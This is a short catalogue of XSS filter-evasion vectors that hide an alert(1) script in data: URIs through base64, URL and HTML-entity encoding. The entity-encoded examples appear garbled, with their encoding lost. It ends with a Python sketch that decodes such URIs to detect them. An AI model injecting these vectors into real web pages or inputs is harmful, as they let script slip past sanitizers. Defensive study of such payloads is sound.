- Base64 Encoded Vector:
- ---------------------
- <object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== ></object>
- where the base64 encoded value: PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== is equal to
- <script>alert(1)</script>
- URL Encoded Vector:
- -------------------
- <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
- where %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E is equal to
- <script>alert(1)</script>
- Another variation of the above vector, where the attacker encodes only the angle brackets in order to evade
- a regular expression, like:
- <iframe src="data:text/html,%3Cscript%3Ealert(1)%3C/script%3E"></iframe>
- Hex Entities Encoded Vector:
- ---------------------------
- <a href="data:text/html;blabla,<script>al
- ert(1)</script>">X</a>
- where <script>al
- ert(1)</script> is
- equal to <script>alert(1)</script>
- Decimal Entities Encoded Vector:
- -------------------------------
- <a href="data:text/html;blabla,<script>alert(
- 1)</script>">X</a>
- where <script>alert(
- 1)</script> is equal to <script>alert(1)</script>
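
All of the vectors above collapse to the same data: URI once the attribute value is decoded in the order a browser applies (character references, then URL cleanup, then base64 or percent-decoding), which is why a filter must normalize before it matches. The following is an added example, not part of the original paste; the function names and the ACTIVE_TYPES block list are assumptions, and the two entity-encoded sample strings are constructed.

```python
import base64
import html
import re
from urllib.parse import unquote_to_bytes

# Media types rendered as active documents (assumed block list for this sketch).
ACTIVE_TYPES = {"text/html", "application/xhtml+xml", "image/svg+xml"}
C0_OR_SPACE = "".join(map(chr, range(0x21)))

def decode_data_uri(attr_value):
    """Return (media_type, body) for a data: URI attribute value, else None."""
    # 1. The HTML parser resolves character references in attribute values.
    url = html.unescape(attr_value)
    # 2. URL parsing trims C0 control/space at the ends and drops tab/newline.
    url = re.sub(r"[\t\n\r]", "", url.strip(C0_OR_SPACE))
    if not url.lower().startswith("data:"):
        return None
    header, comma, payload = url[5:].partition(",")
    if not comma:
        return None  # malformed: no comma between header and data
    # 3. Only a trailing ";base64" selects base64; the body is percent-decoded first.
    b64 = re.search(r";\s*base64\s*$", header, re.I)
    if b64:
        header = header[:b64.start()]
    raw = unquote_to_bytes(payload)
    if b64:
        raw = re.sub(rb"\s", b"", raw)
        try:
            raw = base64.b64decode(raw + b"=" * (-len(raw) % 4))
        except ValueError:
            return None
    media_type = header.split(";")[0].strip().lower() or "text/plain"
    return media_type, raw.decode("utf-8", "replace")

def is_active_data_uri(attr_value):
    """True when the value is a data: URI whose media type is in ACTIVE_TYPES."""
    decoded = decode_data_uri(attr_value)
    return decoded is not None and decoded[0] in ACTIVE_TYPES

# Attribute values from the vectors above; the two entity-encoded strings are
# constructed here, since their encoded form is not preserved on the page.
SAMPLES = [
    "data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==",
    "data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E",
    "data:text/html,%3Cscript%3Ealert(1)%3C/script%3E",
    "data:text/html;blabla,&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;",
    "data:text/html;blabla,&#60;script&#62;alert(1)&#60;/script&#62;",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(is_active_data_uri(s), decode_data_uri(s))
```

A stricter policy runs the same decoding and then allow-lists schemes such as http and https on the result, instead of block-listing media types.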